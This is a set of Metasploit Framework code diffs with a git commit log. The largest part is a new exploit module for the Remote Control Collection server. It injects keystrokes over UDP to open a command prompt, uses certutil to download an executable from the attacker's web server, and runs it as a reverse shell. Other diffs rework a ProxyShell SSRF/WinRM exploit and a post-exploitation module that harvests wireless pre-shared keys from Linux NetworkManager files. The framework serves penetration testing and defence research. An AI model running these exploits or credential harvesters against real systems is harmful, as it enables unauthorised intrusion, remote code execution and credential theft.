-    normal_path = unc_path.gsub(/^\\+[\w.\-]+\\(.)\$\\/, '\1:\\')
+    normal_path = unc_path.gsub(/^\\+[\w.-]+\\(.)\$\\/, '\1:\\')
    print_status("Writing to: #{normal_path}")
    register_file_for_cleanup(normal_path)

    @export_name = rand_text_alphanumeric(8..12)
-    successful = execute_powershell(@common_access_token, 'New-MailboxExportRequest', args: [
+    successful = execute_powershell('New-MailboxExportRequest', cat: @common_access_token, args: [
      { name: '-Name', value: @export_name },
      { name: '-Mailbox', value: @mailbox_user_email },
      { name: '-IncludeFolders', value: '#Drafts#' },
@@ -506,13 +450,13 @@ class MetasploitModule < Msf::Exploit::Remote
    return unless @common_access_token && @export_name

    print_status('Removing the mailbox export request')
-    execute_powershell(@common_access_token, 'Remove-MailboxExportRequest', args: [
+    execute_powershell('Remove-MailboxExportRequest', cat: @common_access_token, args: [
      { name: '-Identity', value: "#{@mailbox_user_email}\\#{@export_name}" },
      { name: '-Confirm', value: false }
    ])

    print_status('Removing the draft email')
-    execute_powershell(@common_access_token, 'Search-Mailbox', args: [
+    execute_powershell('Search-Mailbox', cat: @common_access_token, args: [
      { name: '-Identity', value: @mailbox_user_email },
      { name: '-SearchQuery', value: "Subject:\"#{@draft_subject}\"" },
      { name: '-Force' },
@@ -580,94 +524,3 @@ class PstEncoding
    encoded
  end
 end
-
-class XMLTemplate
-  def self.render(template_name, context = nil)
-    file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', "#{template_name}.xml.erb")
-    template = ::File.binread(file_path)
-    case context
-    when Hash
-      b = binding
-      locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
-      b.eval(locals.join)
-    when NilClass
-      b = binding
-    else
-      raise ArgumentError
-    end
-    b.eval(Erubi::Engine.new(template).src)
-  end
-end
-
-class SSRFWinRMConnection < WinRM::Connection
-  class MessageFactory < WinRM::PSRP::MessageFactory
-    def self.create_pipeline_message(runspace_pool_id, pipeline_id, command)
-      WinRM::PSRP::Message.new(
-        runspace_pool_id,
-        WinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline],
-        XMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]),
-        pipeline_id
-      )
-    end
-  end
-
-  # we have to define this class so we can define our own transport factory that provides one backed by the SSRF
-  # vulnerability
-  class TransportFactory < WinRM::HTTP::TransportFactory
-    class HttpSsrf < WinRM::HTTP::HttpTransport
-      # rubocop:disable Lint/
-      def initialize(endpoint, options)
-        @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint
-        @ssrf_proc = options[:ssrf_proc]
-      end
-
-      def send_request(message)
-        resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })
-        WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml
-      end
-    end
-
-    def create_transport(connection_opts)
-      raise NotImplementedError unless connection_opts[:transport] == :ssrf
-
-      super
-    end
-
-    private
-
-    def init_ssrf_transport(opts)
-      HttpSsrf.new(opts[:endpoint], opts)
-    end
-  end
-
-  module PowerShell
-    def send_command(command, _arguments)
-      command_id = SecureRandom.uuid.to_s.upcase
-      message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)
-      fragmenter.fragment(message) do |fragment|
-        command_args = [connection_opts, shell_id, command_id, fragment]
-        if fragment.start_fragment
-          resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)
-          command_id = REXML::XPath.first(resp_doc, "//*[local-name() = 'CommandId']").text
-        else
-          transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)
-        end
-      end
-
-      command_id
-    end
-  end
-
-  def initialize(connection_opts)
-    # these have to be set to truthy values to pass the option validation, but they're not actually used because hax
-    connection_opts.merge!({ user: :ssrf, password: :ssrf })
-    super(connection_opts)
-  end
-
-  def transport
-    @transport ||= begin
-      transport_factory = TransportFactory.new
-      transport_factory.create_transport(@connection_opts)
-    end
-  end
-end
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Exploit::Remote::Udp
+  include Exploit::EXE # generate_payload_exe
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Control Collection RCE',
+        'Description' => %q{
+          This module utilizes the Remote Control Server's, part
+          of the Remote Control Collection by Steppschuh, protocol
+          to deploy a payload and run it from the server.  This module will only deploy
+          a payload if the server is set without a password (default).
+          Tested against 3.1.1.12, current at the time of module writing
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'H4rk3nz0' # edb, discovery
+        ],
+        'References' => [
+          [ 'URL', 'http://remote-control-collection.com' ],
+          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]
+        ],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Platform' => 'win',
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          ['default', {}],
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp',
+          'WfsDelay' => 5,
+          'Autocheck' => false
+        },
+        'DisclosureDate' => '2022-09-20',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),
+        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
+        OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\\']),
+        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
+      ]
+    )
+  end
+
+  def path
+    return datastore['PATH'] if datastore['PATH'].end_with? '\\'
+
+    "#{datastore['PATH']}\\"
+  end
+
+  def special_key_header
+    "\x7f\x15\x02"
+  end
+
+  def key_header
+    "\x7f\x15\x01"
+  end
+
+  def windows_key
+    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\xab") # key up
+    udp_sock.put("#{special_key_header}\x00\x00\x00\x00\xab") # key down
+    sleep(datastore['SLEEP'])
+  end
+
+  def enter_key
+    udp_sock.put("#{special_key_header}\x01\x00\x00\x00\x42")
+    sleep(datastore['SLEEP'])
+  end
+
+  def send_command(command)
+    command.each_char do |c|
+      udp_sock.put("#{key_header}#{c}")
+      sleep(datastore['SLEEP'] / 10)
+    end
+    enter_key
+    sleep(datastore['SLEEP'])
+  end
+
+  def check
+    @check_run = true
+    @check_success = false
+    upload_file
+    return Exploit::CheckCode::Vulnerable if @check_success
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def on_request_uri(cli, _req)
+    @check_success = true
+    if @check_run # send a random file
+      p = Rex::Text.rand_text_alphanumeric(rand(8..17))
+    else
+      p = generate_payload_exe
+    end
+    send_response(cli, p)
+    print_good("Request received, sending #{p.length} bytes")
+  end
+
+  def upload_file
+    connect_udp
+    # send a space character to skip any screensaver
+    udp_sock.put("#{key_header} ")
+    print_status('Connecting and Sending Windows key')
+    windows_key
+
+    print_status('Opening command prompt')
+    send_command('cmd.exe')
+
+    filename = Rex::Text.rand_text_alphanumeric(rand(8..17))
+    filename << '.exe' unless @check_run
+    if @service_started.nil?
+      print_status('Starting up our web service...')
+      start_service('Path' => '/')
+      @service_started = true
+    end
+    get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"
+    send_command(get_file)
+    if @check_run.nil? || @check_run == true
+      send_command("del #{path}#{filename} && exit")
+    else
+      register_file_for_cleanup("#{path}#{filename}")
+      print_status('Executing payload')
+      send_command("#{path}#{filename} && exit")
+    end
+    disconnect_udp
+  end
+
+  def exploit
+    @check_run = false
+    upload_file
+  end
+end
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Post

  # Run Method for when run command is issued
  def run
-    host = get_host
+    print_status("Running module against #{get_hostname} (#{session.session_host})")
+
    user = execute("/usr/bin/whoami")
    print_status("Module running as #{user}")

@@ -82,20 +83,6 @@ class MetasploitModule < Msf::Post
    print_good("#{msg} stored in #{loot.to_s}")
  end

-  # Get host name
-  def get_host
-    case session.type
-    when /meterpreter/
-      host = sysinfo["Computer"]
-    when /shell/
-      host = cmd_exec("hostname").chomp
-    end
-
-    print_status("Running module against #{host}")
-
-    return host
-  end
-
  def execute(cmd)
    verification_token = Rex::Text::rand_text_alpha(8)
    vprint_status("Execute: #{cmd}")
@@ -7,103 +7,111 @@ class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
-
  include Msf::Auxiliary::Report

-  def initialize(info={})
-    super(update_info(info,
-      'Name'          => 'Linux Gather 802-11-Wireless-Security Credentials',
-      'Description'   => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux Gather NetworkManager 802-11-Wireless-Security Credentials',
+        'Description' => %q{
          This module collects 802-11-Wireless-Security credentials such as
-          Access-Point name and Pre-Shared-Key from your target CLIENT Linux
-          machine using /etc/NetworkManager/system-connections/ files.
-          The module gathers NetworkManager's plaintext "psk" information.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => ['Cenk Kalpakoglu'],
-      'Platform'      => ['linux'],
-      'SessionTypes'  => ['shell', 'meterpreter']
-    ))
+          Access-Point name and Pre-Shared-Key from Linux NetworkManager
+          connection configuration files.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Cenk Kalpakoglu'],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )

-    register_options(
-      [
-        OptString.new('DIR', [true, 'The default path for network connections',
-                              '/etc/NetworkManager/system-connections/']
-        )
-      ])
+    register_options([
+      OptString.new('DIR', [true, 'The path for NetworkManager configuration files', '/etc/NetworkManager/system-connections/'])
+    ])
  end

-  def dir
+  def connections_directory
    datastore['DIR']
  end

-  # Extracts AccessPoint name and PSK
-  def get_psk(data, ap_name)
+  def extract_psk_from_file(path)
+    return if path.blank?
+
+    print_status("Reading file #{path}")
+    data = read_file(path)
+
+    return if data.blank?
+
    data.each_line do |l|
-      if l =~ /^psk=/
-        psk = l.split('=')[1].strip
-        return [ap_name, psk]
-      end
+      next unless l.starts_with?('psk=')
+
+      psk = l.split('=')[1].strip
+
+      return psk unless psk.blank?
    end
+
    nil
  end

-  def extract_all_creds
-    tbl = Rex::Text::Table.new({
-      'Header'  => '802-11-wireless-security',
-      'Columns' => ['AccessPoint-Name', 'PSK'],
-      'Indent'  => 1,
-    })
-    files = cmd_exec("/bin/ls -1 #{dir}").chomp.split("\n")
-    files.each do |f|
-      file = "#{dir}#{f}"
-      # TODO: find better (ruby) way
-      if data = read_file(file)
-        print_status("Reading file #{file}")
-        ret = get_psk(data, f)
-        if ret
-          tbl << ret
-        end
-      end
-    end
-    tbl
-  end
-
  def run
-    if is_root?
-      tbl = extract_all_creds
-      if tbl.rows.empty?
-        print_status('No PSK has been found!')
-      else
-        print_line("\n" + tbl.to_s)
-        p = store_loot(
-          'linux.psk.creds',
-          'text/csv',
-          session,
-          tbl.to_csv,
-          File.basename('wireless_credentials.txt')
-        )
+    unless is_root?
+      fail_with(Failure::NoAccess, 'You must run this module as root!')
+    end

-        print_good("Secrets stored in: #{p}")
+    connection_files = dir(connections_directory)

-        tbl.rows.each do |cred|
-          user = cred[0] # AP name
-          password = cred[1]
-          create_credential(
-            workspace_id: myworkspace_id,
-            origin_type: :session,
-            address: session.session_host,
-            session_id: session_db_id,
-            post_reference_name: self.refname,
-            username: user,
-            private_data: password,
-            private_type: :password,
-          )
-        end
-        print_status("Done")
-      end
-    else
-      print_error('You must run this module as root!')
+    if connection_files.blank?
+      print_status('No network connections found')
+      return
+    end
+
+    tbl = Rex::Text::Table.new({
+      'Header' => '802-11-wireless-security',
+      'Columns' => ['AccessPoint-Name', 'PSK'],
+      'Indent' => 1
+    })
+
+    connection_files.each do |f|
+      psk = extract_psk_from_file("#{connections_directory}/#{f}")
+      tbl << [f, psk] unless psk.blank?
+    end
+
+    if tbl.rows.empty?
+      print_status('No wireless PSKs found')
+      return
+    end
+
+    print_line("\n#{tbl}")
+
+    p = store_loot(
+      'linux.psk.creds',
+      'text/csv',
+      session,
+      tbl.to_csv,
+      'wireless_credentials.txt'
+    )
+
+    print_good("Credentials stored in: #{p}")
+
+    tbl.rows.each do |cred|
+      user = cred[0] # AP name
+      password = cred[1]
+      create_credential(
+        workspace_id: myworkspace_id,
+        origin_type: :session,
+        address: session.session_host,
+        session_id: session_db_id,
+        post_reference_name: refname,
+        username: user,
+        private_data: password,
+        private_type: :password
+      )
    end
  end
 end
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Post
  end

  def run
+    print_status("Running module against #{get_hostname} (#{session.session_host})")
+
    distro = get_sysinfo
-    h = get_host
-    print_status("Running module against #{h}")
    print_status("Info:")
    print_status("\t#{distro[:version]}")
    print_status("\t#{distro[:kernel]}")
@@ -48,18 +48,9 @@ class MetasploitModule < Msf::Post
    print_status("#{fname} stored in #{loot.to_s}")
  end

-  def get_host
-    case session.type
-    when /meterpreter/
-      host = sysinfo["Computer"]
-    when /shell/
-      host = cmd_exec("hostname").chomp
-    end
-
-    return host
-  end
-
  def find_torrc
+    fail_with(Failure::BadConfig, "'locate' command does not exist") unless command_exists?('locate')
+
    config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
    if config.length == 0
        print_error ("No torrc file found, maybe it goes by a different name?")
@@ -0,0 +1,68 @@
+require 'spec_helper'
+
+RSpec.describe Msf::Payload::Python::ReverseHttp do
+  def create_payload(info = {})
+    klass = Class.new(Msf::Payload)
+    klass.include Msf::Handler::ReverseHttp
+    klass.include Msf::Payload::Python
+    klass.include described_class
+    mod = klass.new(info)
+    datastore.each { |k, v| mod.datastore[k] = v }
+    mod
+  end
+
+  let(:datastore) do
+    {
+      'LHOST' => '127.0.0.1',
+      'HttpUserAgent' => 'HttpUserAgent',
+    }
+  end
+
+  let(:cached_size) { 500 }
+  let(:is_dynamic_size) { false }
+
+  before(:each) do
+    allow(subject).to receive(:cached_size).and_return(cached_size)
+    allow(subject).to receive(:dynamic_size?).and_return(is_dynamic_size)
+  end
+
+  describe '#generate' do
+    let(:subject) { create_payload }
+
+    context 'when the payload is static' do
+      let(:cached_size) { 500 }
+      let(:is_dynamic_size) { false }
+
+      context 'when available space is nil' do
+        it 'generates a payload' do
+          expect(subject.generate).to be_a(String)
+        end
+      end
+
+      context 'when available space is defined' do
+        it 'generates a payload' do
+          subject.available_space = 2000
+          expect(subject.generate).to be_a(String)
+        end
+      end
+    end
+
+    context 'when the payload is dynamic' do
+      let(:cached_size) { nil }
+      let(:is_dynamic_size) { true }
+
+      context 'when available space is nil' do
+        it 'generates a payload' do
+          expect(subject.generate).to be_a(String)
+        end
+      end
+
+      context 'when available space is defined' do
+        it 'generates a payload' do
+          subject.available_space = 2000
+          expect(subject.generate).to be_a(String)
+        end
+      end
+    end
+  end
+end
Author	SHA1	Message	Date
Metasploit	03bb062c2e	automatic module_metadata_base.json update	2022-12-01 09:50:22 -06:00
bwatters	dcff4d37b6	Land #17163 , Pfsense PfBlockerNG RCE module check method improvement Merge branch 'land-17163' into upstream-master	2022-12-01 09:25:18 -06:00
Metasploit	b9c18de4fe	automatic module_metadata_base.json update	2022-11-30 16:55:15 -06:00
adfoster-r7	13ab155545	Land #17322 , fix OpoenOffice description typo	2022-11-30 22:31:53 +00:00
Maik Ro	330cb2944b	fix typo OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt']) -> OpoenOffice changed to OpenOffice	2022-11-30 22:10:18 +01:00
Metasploit	07a91df7a1	automatic module_metadata_base.json update	2022-11-30 11:43:21 -06:00
Christophe De La Fuente	d3057f15b2	Land #17275 , Add Exploit For CVE-2022-41082 (ProxyNotShell)	2022-11-30 18:16:19 +01:00
Metasploit	35bbfc8af4	automatic module_metadata_base.json update	2022-11-28 15:47:01 -06:00
Spencer McIntyre	8ea8e2410d	Land #17299 , Fixes #17227 Fixes #17227 - polkit_dbus_auth_bypass module when run from a command…	2022-11-28 16:22:52 -05:00
Metasploit	8a66a359a6	automatic module_metadata_base.json update	2022-11-28 15:16:21 -06:00
Jack Heysel	5d3cfa69b8	Land #17210 , add ParseError rescue to snmp modules snmp_enum, snmp_enumshares and snmp_enumusers now rescue SNMP ParseErrors	2022-11-28 15:37:02 -05:00
bwatters	3462dc6bf4	Land #17087 , remote control collection rce Merge branch 'land-17087' into upstream-master	2022-11-28 14:29:52 -06:00
Spencer McIntyre	264d45e04a	Appease rubocop	2022-11-28 10:16:55 -05:00
Spencer McIntyre	f24df8a051	Change an exception class and drop DOMAIN passing	2022-11-28 10:06:14 -05:00
Spencer McIntyre	009c6c5350	Add the MaxBackendRetries datastore option	2022-11-28 09:45:04 -05:00
Metasploit	c49dd0b6cd	automatic module_metadata_base.json update	2022-11-27 14:27:39 -06:00
adfoster-r7	de75f0ecbe	Land #17304 , added target uri in to "Authorization not requested" error message	2022-11-27 20:04:00 +00:00
omer citak	9aa1a84b3a	added target uri in to "Authorization not requested" error message	2022-11-27 15:35:34 +03:00
Ashley Donaldson	638a1c8f78	Prevent double-delimiter situations in general	2022-11-25 15:32:55 +11:00
Ashley Donaldson	25a0d0ff0e	Fixes #17227 - polkit_dbus_auth_bypass module when run from a command shell	2022-11-25 15:13:57 +11:00
adfoster-r7	c218063a1a	Land #17280 , Weekly dependency updates for Gemfile.lock	2022-11-24 23:11:49 +00:00
Metasploit	ed954eec0c	Bump version of framework to 6.2.29	2022-11-24 12:09:06 -06:00
adfoster-r7	0aa0884e26	Land #17296 , add warning about external links	2022-11-24 10:30:44 +00:00
Metasploit	c9ba07e3a7	automatic module_metadata_base.json update	2022-11-23 17:20:29 -06:00
Spencer McIntyre	6350daf2d8	Land #17273 , F5 exploit module CVE-2022-41800 F5 exploit module CVE-2022-41800 (authenticated RCE in RPM code)	2022-11-23 17:57:18 -05:00
Spencer McIntyre	3805a79079	Add support for Exchange Data Access Group (DAG) This updates the HttpSsrf class to retry requests to the Powershell backend when they fail because they were routed to a new server. Now when the transport is initialized, it will store the backend used by the first successful request.	2022-11-23 15:37:58 -05:00
Jeffrey Martin	453cfc5939	spelling change per review Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>	2022-11-23 13:26:19 -06:00
Ron Bowes	cbb50ed902	Remove non-functioning Arch'es	2022-11-23 10:42:07 -08:00
Jeffrey Martin	cb8e023734	add warning about external links Links to external resources not controlled by the project maintainers are subject to bitrot and malicious take over. Warnings seem appropriate.	2022-11-23 12:08:05 -06:00
Spencer McIntyre	3f58bfe11e	Check that the target is Exchange Server 2019	2022-11-23 10:47:10 -05:00
Spencer McIntyre	45391b1714	Land #17279 , ducky-script format for msfvenom ducky-script format for msfvenom (flipper zero compatible)	2022-11-23 09:05:57 -05:00
h00die	b866917ee1	review	2022-11-22 16:57:01 -05:00
Spencer McIntyre	2265370c5f	Land #17288 , Add #bit_names to MsDtypAccessMask Support for Windows Access mask to MsDtypAccessMask	2022-11-22 09:01:16 -05:00
Metasploit	0af1f95f5a	automatic module_metadata_base.json update	2022-11-22 06:52:15 -06:00
adfoster-r7	6446c1425b	Land #17283 , enum_psk: Cleanup	2022-11-22 12:28:55 +00:00
adfoster-r7	6c76fd7beb	Land #17284 , modules/post/linux/gather: Use Post::Linux::System.get_hostname method	2022-11-22 11:55:47 +00:00
adfoster-r7	390e58958c	Land #17285 , tor_hiddenservices - check locate command exists : Check locate command exists	2022-11-22 11:42:50 +00:00
JustAnda7	28157b677b	Support for Access Mask in MsDtypAccess	2022-11-22 04:50:54 -05:00
h00die	637ad5f809	make ducky more psh friendly	2022-11-21 17:55:48 -05:00
h00die	7227bec259	set autocheck false	2022-11-21 15:53:37 -05:00
bwatters	8c9e2c9fc7	Add check method, update hosting IP/port	2022-11-21 15:53:37 -05:00
h00die	d141efcbfe	screen effects	2022-11-21 15:53:37 -05:00
h00die	181b8e4eea	review comments	2022-11-21 15:53:37 -05:00
h00die	d4536b24a6	remote control collection rce	2022-11-21 15:53:37 -05:00
Spencer McIntyre	de8a396b3a	Land #17277 , Fix python reverse http stager crash	2022-11-21 12:41:25 -05:00
Spencer McIntyre	ed99f2f67f	Bypass EEMS M1	2022-11-21 11:13:16 -05:00
bcoles	651dd68439	tor_hiddenservices: Check locate command exists	2022-11-21 01:07:50 +11:00
bcoles	2dbd2043ec	modules/post/linux/gather: Use Post::Linux::System.get_hostname method	2022-11-21 00:46:44 +11:00
bcoles	ad36f28ec1	enum_psk: Cleanup	2022-11-21 00:28:34 +11:00
Metasploit	234949bff8	automatic module_metadata_base.json update	2022-11-18 19:52:50 -06:00
Grant Willcox	8ca7550062	Land #17257 , Adding exploit for ChurchInfo 1.2.13-1.3.0 RCE (CVE-2021-43258)	2022-11-18 19:27:10 -06:00
Grant Willcox	237eb904d4	Add in fixes for documentation examples and then update the code to fix some bugs	2022-11-18 18:30:07 -06:00
Grant Willcox	713323f2cb	Add in Docker setup documentation	2022-11-18 18:22:11 -06:00
Grant Willcox	85a6770973	Add additional checks, a check method, and fix up some doc errors	2022-11-18 18:22:06 -06:00
m4lwhere	b9ecdb3bc2	Use TARGETURI, registered cleanup, implment cookie_jar, and perform response checks and documentation	2022-11-18 18:21:27 -06:00
m4lwhere	a33a313544	Adding exploit for ChurchInfo 1.3.0	2022-11-18 18:21:08 -06:00
Metasploit	2f2708e3fd	automatic module_metadata_base.json update	2022-11-18 16:42:50 -06:00
Spencer McIntyre	bc89721d7a	Add module docs, fix ProxyShell versions	2022-11-18 17:42:27 -05:00
Jeffrey Martin	f6bdbbd359	Weekly dependency updates for Gemfile.lock	2022-11-18 16:24:55 -06:00
space-r7	3d5708e3e6	Land #17271 , add f5 big-ip csrf exploit	2022-11-18 16:19:09 -06:00
space-r7	8b30ff3dce	remove CmdStager inclusion	2022-11-18 16:18:25 -06:00
h00die	29b7fa5336	ducky_script format for msfvenom	2022-11-18 17:02:52 -05:00
Spencer McIntyre	29d57dde66	Consolidate into ProxyMaybeShell	2022-11-18 17:01:01 -05:00
Spencer McIntyre	fc7594dbc8	Add exploit for CVE-2022-41082 AKA ProxyNotShell	2022-11-18 17:00:27 -05:00
Metasploit	e43951158c	automatic module_metadata_base.json update	2022-11-18 10:40:12 -06:00
bwatters	20e1788d97	Land #17145 , Add hashes option and better error handling to wmiexec Merge branch 'land-17145' into upstream-master	2022-11-18 10:16:33 -06:00
adfoster-r7	7dcf65d7c3	Fix python reverse http stager crash	2022-11-18 14:32:36 +00:00
Metasploit	39da40e4b5	Bump version of framework to 6.2.28	2022-11-17 12:21:32 -06:00
Metasploit	29a4546b07	automatic module_metadata_base.json update	2022-11-17 05:52:06 -06:00
Christophe De La Fuente	d1a7170020	Land #17021 , Gitea Git fetch RCE module - CVE-2022-30781	2022-11-17 12:28:29 +01:00
Christophe De La Fuente	11541a5774	Add comment for details about the string substitutions on Windows	2022-11-17 12:25:52 +01:00
Ron Bowes	7ebf84c66b	Add URLs	2022-11-16 12:20:37 -08:00
Ron Bowes	20e6c1b55e	Add URLs	2022-11-16 12:19:16 -08:00
Ron Bowes	d0e109b842	Check in exploit module for CVE-2022-41800	2022-11-16 12:04:18 -08:00
Ron Bowes	99e661cfcf	Check in exploit script for CVE-2022-41622 (CSRF into SOAP)	2022-11-16 11:58:15 -08:00
Jeffrey Martin	271a2bb6f2	Land #17264 , Go 1.11.2 to 1.19.3 in Dockerfile	2022-11-16 12:26:13 -06:00
Spencer McIntyre	b4f285d9b2	Land #17243 , Improve railgun tlv packet logging Improve tlv packet logging for railgun	2022-11-16 09:26:07 -05:00
Grant Willcox	15dc37a663	Bump Go version from 1.11.2 to 1.19.3	2022-11-15 10:28:51 -06:00
Grant Willcox	1205356a27	Land #17263 , Update metasploit-payloads gem to 2.0.101	2022-11-15 10:03:55 -06:00
krastanoel	1ddc137f1a	Update module - adjust execute_command method and add logic for :win_dropper target - move cmdstager uripath setting into target case statement - add more cmdstagerflavour for :linux_dropper target - fix lint msftidy	2022-11-15 22:30:45 +07:00
krastanoel	cbca2a5604	Update modules/exploits/multi/http/gitea_git_fetch_rce.rb apply suggestion Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>	2022-11-15 22:17:59 +07:00
Spencer McIntyre	836109c02b	Update metasploit-payloads gem to 2.0.101 Includes changes from: * rapid7/metasploit-payloads#592 * rapid7/metasploit-payloads#595	2022-11-15 09:52:06 -05:00
Jeffrey Martin	fa125e1943	Land #17261 , Fix Port Forwarding For Ruby 3	2022-11-15 08:27:00 -06:00
Spencer McIntyre	2459371a47	Print the portfwd relay more descriptively Closes #17158 This updates the output of the portfwd command to show if it's a forward (normal) portforward or if it's a reverse port forward where the compromised host is the one listening.	2022-11-15 08:50:23 -05:00
Metasploit	51310bcec7	automatic module_metadata_base.json update	2022-11-15 07:38:18 -06:00
Christophe De La Fuente	494c9601ca	Land #17222 , Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream [CVE-2021-39144]	2022-11-15 14:16:14 +01:00
Spencer McIntyre	218e8c2d0c	Fix a Ruby 3 syntax issue Closes #17124 This fixes a Ruby 3 syntax issue in how the parameters are passed. The issue caused TcpServerChannels to fail to enqueue new client connections.	2022-11-14 17:01:51 -05:00
Metasploit	6de67cceef	automatic module_metadata_base.json update	2022-11-14 15:01:56 -06:00
Grant Willcox	446e19d15b	Land #17260 , Use the access mask data type	2022-11-14 14:39:29 -06:00
Spencer McIntyre	eff9a16e00	Use the access mask data type Also switch from bit16 to uint16 so it's little endian.	2022-11-14 12:27:38 -05:00
Grant Willcox	068bb59eb8	Land #17253 , update wordpress plugins and themes lists	2022-11-14 09:51:17 -06:00
Metasploit	af5fe41fa9	automatic module_metadata_base.json update	2022-11-12 17:47:54 -06:00
adfoster-r7	584e120793	Land #17256 , minor grammar fix	2022-11-12 23:26:45 +00:00
h00die	59535b6799	remove 'is'	2022-11-12 16:19:50 -05:00
h00die-gr3y	70669f3fea	addressed code improvement suggestions	2022-11-12 10:21:43 +00:00
H00die.Gr3y	72080910e7	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>	2022-11-12 09:22:06 +01:00
H00die.Gr3y	85b4512292	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>	2022-11-12 09:21:55 +01:00
H00die.Gr3y	5d314e5799	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>	2022-11-12 09:21:42 +01:00
H00die.Gr3y	04d6a310af	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>	2022-11-12 09:16:46 +01:00
H00die.Gr3y	1ce8695401	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>	2022-11-12 09:16:30 +01:00
H00die.Gr3y	e38138d69e	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>	2022-11-12 09:16:17 +01:00
H00die.Gr3y	967388eba7	Update modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb Agreed ! Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>	2022-11-12 09:15:42 +01:00
h00die	4c958546b5	update wordpress plugins and themes lists	2022-11-11 10:37:26 -05:00
adfoster-r7	54cb34ac03	Land #17252 , Adds error handling for users who do not have git available on their environment	2022-11-11 14:15:16 +00:00
cgranleese-r7	ef28a963bf	Adds error handling for users who do not have git available on their machine	2022-11-11 13:33:39 +00:00
Metasploit	bcf8c96128	Bump version of framework to 6.2.27	2022-11-10 12:17:58 -06:00
adfoster-r7	db3d8f1bbc	Improve tlv packet logging for railgun	2022-11-09 11:31:27 +00:00
krastanoel	645a1c25a3	Update method documentation and indentation	2022-11-09 16:27:31 +07:00
krastanoel	639afebe1e	Update module - handle cleanup method on manual `check` - adjust targets flavour option - add :win_dropper target and handle the payload delivery NOTE: the Windows dropper target is still unsuccessfull but keep this for further review	2022-11-09 16:12:20 +07:00
krastanoel	13bb31feeb	Update module - move repository migration to execute_command. NOTE: the stageless payload is still unsuccessfull but keep this anyway for christophe to review.	2022-11-09 04:52:18 +07:00
krastanoel	bca5138fc8	Update module - move cleanup process to its own method and handle the response - remove timeout and http delay option - adjust target type location as code review suggestion	2022-11-09 01:42:27 +07:00
krastanoel	a50cca27e6	remove cookie_jar manipulation	2022-11-09 00:48:23 +07:00
krastanoel	52d867bbc7	follow Ruby coding convetions - combine gitea_version into get_gitea_version for the check method - validate empty username	2022-11-09 00:41:30 +07:00
krastanoel	c980f4f9ee	add more custom error exception	2022-11-09 00:27:12 +07:00
